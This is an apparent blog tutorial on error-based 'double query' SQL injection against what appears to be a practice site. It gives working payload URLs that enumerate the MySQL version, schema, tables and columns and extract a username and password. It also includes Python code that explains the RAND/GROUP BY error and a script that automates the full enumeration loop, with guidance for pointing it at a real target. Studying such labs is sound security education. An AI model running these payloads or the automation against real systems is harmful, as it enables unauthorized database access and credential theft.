Double Query Based SQL Injection

Double Query Based SQL Injection :-

Hello everyone once again. Today I am going to show you how "Double Query Based Injection" actually works. The name comes from the shape of the payload: one SELECT that fetches what we want, nested inside a second SELECT built from COUNT(*), CONCAT() and FLOOR(RAND(0)*2) with a GROUP BY. RAND(0) is seeded, so it returns the same 0,1,1,0,1,1,... pattern on every run, and MySQL evaluates the GROUP BY key once to look a group up and once more when it inserts it, so by the third row the computed key collides and MySQL aborts with "Duplicate entry '...' for key 'group_key'". Our data is sitting inside that key, and the page prints the error for us. That is also the one requirement: the application has to show MySQL errors on the page. A fresh mind is always needed before doing anything, and presence of mind and passion for the work you want to achieve. So let's get started.



Let's get the DB version

Here is our query (CAST(VERSION() AS CHAR) with a 0x7e, i.e. ~, marker on the end so we can see where our value stops):

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+CONCAT(CAST(VERSION()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

And the page returns with

Duplicate entry '5.5.48-cll~1' for key 'group_key'

'5.5.48-cll' is the version of the database. The ~ is the marker we added, and the trailing 1 is the FLOOR(RAND(0)*2) value that completed the group key, not part of the version.
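Why does this error come out at all? The following is an added example, my code and not something from the original post: a Python model of MySQL's RAND() generator (RAND(0) is seeded, so it produces the same values every time) and of the GROUP BY temporary table, where the key is evaluated once for the lookup and again when a new group is inserted. The constants are MySQL's own seed formula and 0x3FFFFFFF modulus; the temp-table loop is a model of the documented behaviour, not a copy of the server code. Running it reproduces the same "Duplicate entry ...~1" text MySQL printed above and shows why the table being grouped needs at least three rows (INFORMATION_SCHEMA.TABLES always has far more).

```python
# Added example (not from the original post): why
#   SELECT COUNT(*), CONCAT(data, FLOOR(RAND(0)*2)) x FROM t GROUP BY x
# throws ER_DUP_ENTRY with our data inside the key.

MAX_VALUE = 0x3FFFFFFF  # modulus used by MySQL's my_rnd()


class MySQLRand:
    """RAND(seed) as MySQL computes it (two-seed LCG); RAND(0) is deterministic."""

    def __init__(self, seed=0):
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def next(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand0(n):
    """FLOOR(RAND(0)*2) for the first n calls: 0, 1, 1, 0, 1, 1, 0, 0, 1, 1, ..."""
    r = MySQLRand(0)
    return [int(r.next() * 2) for _ in range(n)]


def group_by_rand(data, rows):
    """Model of the GROUP BY over `rows` rows. The group key is computed for
    the lookup; if the group does not exist yet it is computed AGAIN for the
    insert, and RAND() has moved on in between. Returns the MySQL error text
    on a collision, otherwise 'ok' (query succeeds, nothing leaks)."""
    rand = MySQLRand(0)
    groups = {}  # temporary table: group key -> COUNT(*)
    for _ in range(rows):
        key = f"{data}{int(rand.next() * 2)}"  # evaluated for the lookup
        if key in groups:
            groups[key] += 1
            continue
        key = f"{data}{int(rand.next() * 2)}"  # evaluated again for the insert
        if key in groups:  # the re-evaluated key already exists -> ER_DUP_ENTRY
            return f"Duplicate entry '{key}' for key 'group_key'"
        groups[key] = 1
    return "ok"


if __name__ == "__main__":
    print(floor_rand0(10))
    for n in (1, 2, 3):
        print(n, "rows:", group_by_rand("5.5.48-cll~", n))
```

Trace it with three rows: row 1 looks up "...~0", misses, and inserts "...~1"; row 2 looks up "...~1" and hits; row 3 looks up "...~0", misses, re-evaluates to "...~1" and the insert collides. Whatever we put in the CONCAT is part of that key, so it is part of the error message, which is the whole trick.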
For the rest of this injection we need the DB name, because the INFORMATION_SCHEMA lookups below are filtered on table_schema, so let's get the DB name.

Here is our DB query. One thing to notice: INFORMATION_SCHEMA.SCHEMATA has no table_schema column (its column is schema_name), so MySQL resolves that name against the outer INFORMATION_SCHEMA.TABLES query instead of raising an error. The WHERE is therefore not really filtering the schema list; the LIMIT offset is what picks the schema, and LIMIT 1,1 (skip one, return one) lands on the site's database. If all you want is the current database, SELECT DATABASE() in the inner query does it in one shot.

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

And the page returns with

Duplicate entry '~'leettime_761wHole'~1' for key 'group_key'

'leettime_761wHole' is the name of the database (the ~' and '~ around it are the 0x7e,0x27 markers from our CONCAT). Now we need the table names, so let's get them.

Here is our TABLE_NAMES query:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'++AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(table_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

Put the database name in hex after table_schema= (0x followed by the hex of the DB name: leettime_761wHole is 0x6c65657474696d655f37363177486f6c65). MySQL treats the 0x literal as the string, and it keeps quotes out of the payload, which would otherwise clash with the quote we used to break out of the id parameter.

The page returns with

Duplicate entry '~'testtable1'~1' for key 'group_key'

'testtable1' is the first table name. We are after a sensitive table, something like users, Users, admin, tbl_login, etc., so we step through the list. In LIMIT 0,1 (right after table_schema=0xHEX OF DB NAME) the first number is the offset, how many rows to skip, and the second is how many rows to return. Change the 0 to 1, so the limit becomes LIMIT 1,1, and we get the second table.

Here is our query:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'++AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(table_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

LIMIT 1,1 means skip one row and return one, so this gives the second table name (it is not the number of tables).

And the page returns with

Duplicate entry '~'userlogs'~1' for key 'group_key'

'userlogs' is the second table name. Keep increasing the offset until you hit the sensitive table. Here is our query with LIMIT 2,1:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'++AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(table_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

And the page returns with

Duplicate entry '~'users'~1' for key 'group_key'

'users' is the third table name, and it is the sensitive one. Let's get its column names now.

Here is our query:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(column_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+AND+table_name=0x7573657273+LIMIT+0,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

This time the inner SELECT reads INFORMATION_SCHEMA.COLUMNS and the WHERE filters on both table_schema and table_name. Put the table name in hex after table_name= the same way as the database name: users is 0x7573657273.

The page returns with

Duplicate entry '~'id'~1' for key 'group_key'

'id' is the first column name. Let's get the second one: change the 0 in "table_name=0xHEX OF TABLE NAME LIMIT 0,1" to 1, so the limit becomes LIMIT 1,1.

Here is our query:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(column_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+AND+table_name=0x7573657273+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

And the page returns with

Duplicate entry '~'username'~1' for key 'group_key'

'username' is the second column name. Remember it, it holds the USERNAME. Now we need the password column, so increase the offset again (LIMIT 2,1).

Here is our query:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(column_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+AND+table_name=0x7573657273+LIMIT+2,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

The page returns with

'password'

in the duplicate entry error. That is the third column name.

BINGO!! We have the DB_NAME, TBL_NAME and COL_NAMES. Let's extract the data.

Here is our query. The inner SELECT now reads from the real table, written as db_name.table_name, and CASTs the column we want AS CHAR. The database name is leettime_761wHole, the table is users and the column is username, so the whole query is:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM(SELECT+count(*),CONCAT((SELECT+(SELECT+(SELECT+CONCAT(0x7e,0x27,cast(username+AS+CHAR),0x27,0x7e)+FROM+leettime_761wHole.users+LIMIT+0,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

And the page returns with

'admin'

This is the username in the first row. For the next row, change LIMIT 0,1 after db_name.table_name to LIMIT 1,1, the same as we did for tables and columns.

Let's get the password.

Password Query :-

Same query, with password in the CAST instead of username:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM(SELECT+count(*),CONCAT((SELECT+(SELECT+(SELECT+CONCAT(0x7e,0x27,cast(password+AS+CHAR),0x27,0x7e)+FROM+leettime_761wHole.users+LIMIT+0,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

And the page returns with

'khan'

which is the password in the first row. If you want to be certain a username and a password came from the same row, pull both at once with CONCAT(username,0x3a,password) in the inner SELECT rather than relying on two separate LIMIT 0,1 queries returning rows in the same order.
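Stepping the LIMIT by hand like this gets old fast. Here is an added example, my own code and not from the original post, that automates the whole loop (DB, tables, columns, rows): it builds the same double query around an inner SELECT, bumps the offset until the error stops appearing, and pulls the value back out of the error text, HTML-unescaping it first because many pages encode the quotes. The names in it (leettime_761wHole, users, username, password) are the ones recovered above; the `send` callable that actually performs the GET is assumed to be supplied by you, and `demo_send` is a constructed stand-in loaded with this post's rows so the script runs offline.

```python
import html
import re
from urllib.parse import quote_plus

# Added example (not from the original post): automate the double-query
# enumeration loop. `send(payload) -> page body` is supplied by the caller.

ERR_RE = re.compile(r"Duplicate entry '~'(.*?)'~1' for key 'group_key'")


def to_hex(s):
    """String -> 0x.. literal, so the payload carries no quote characters."""
    return "0x" + s.encode().hex()


def inner_select(column, table, where="", offset=0, distinct=True):
    """One scalar SELECT: CAST(column AS CHAR) between the ~' and '~ markers.
    DISTINCT mirrors the post's metadata queries; use distinct=False when
    pulling rows that may legitimately repeat."""
    d = "DISTINCT " if distinct else ""
    w = f" WHERE {where}" if where else ""
    return (f"SELECT {d}CONCAT(0x7e,0x27,CAST({column} AS CHAR),0x27,0x7e) "
            f"FROM {table}{w} LIMIT {offset},1")


def double_query(inner):
    """Wrap the inner SELECT in the COUNT(*)/FLOOR(RAND(0)*2)/GROUP BY error."""
    return ("1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT (SELECT ("
            f"{inner})) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),"
            "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)"
            " AND 1=1-- ")


def build_url(base, payload):
    """The GET the post sends, with spaces as '+' and quotes percent-encoded."""
    return f"{base}?id={quote_plus(payload)}"


def parse_value(body):
    """Value between the ~' '~ markers, or None if the page did not error."""
    m = ERR_RE.search(html.unescape(body))
    return m.group(1) if m else None


def enumerate_values(send, column, table, where="", max_rows=64, distinct=True):
    """Step LIMIT offset,1 upward until the error stops appearing."""
    found = []
    for offset in range(max_rows):
        body = send(double_query(inner_select(column, table, where, offset, distinct)))
        value = parse_value(body)
        if value is None:
            break
        found.append(value)
    return found


# Constructed stand-in for the target so the example runs offline: it answers
# like a MySQL-backed page that echoes the error (HTML-escaped, as templating
# engines usually do), using the rows the post recovered. Not a real server.
_FAKE_ROWS = {
    "schema_name": ["information_schema", "leettime_761wHole"],
    "table_name": ["testtable1", "userlogs", "users"],
    "column_name": ["id", "username", "password"],
    "username": ["admin"],
    "password": ["khan"],
}


def demo_send(payload):
    m = re.search(r"CAST\((\w+) AS CHAR\).*?LIMIT (\d+),1", payload)
    rows = _FAKE_ROWS.get(m.group(1), [])
    offset = int(m.group(2))
    if offset >= len(rows):
        return "<p>item not found</p>"  # offset past the end: no error, no leak
    err = f"Duplicate entry '~'{rows[offset]}'~1' for key 'group_key'"
    return f"<p>{html.escape(err)}</p>"


if __name__ == "__main__":
    db = to_hex("leettime_761wHole")
    print(enumerate_values(demo_send, "table_name", "INFORMATION_SCHEMA.TABLES",
                           f"table_schema={db}"))
    print(enumerate_values(demo_send, "column_name", "INFORMATION_SCHEMA.COLUMNS",
                           f"table_schema={db} AND table_name={to_hex('users')}"))
    print(enumerate_values(demo_send, "username", "leettime_761wHole.users", distinct=False))
    print(build_url("http://leettime.net/sqlninja.com/tasks/basic_ch1.php",
                    double_query(inner_select("password", "leettime_761wHole.users"))))
```

Against a real target, replace `demo_send` with a function that does the GET through your proxy and returns the body. Two things to keep in mind: the error message only shows a limited prefix of the key, so wrap long values in MID(...,1,32), MID(...,33,32) and so on inside the inner SELECT, and when the offset runs past the last row the inner SELECT yields NULL and the page simply stops erroring, which is what the loop uses as its stop condition.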

Stay Tuned for more tutorials on Different types of SQL Injections... Have a good day folks.

Reviewed by Unknown on 15:25:00 Rating: 5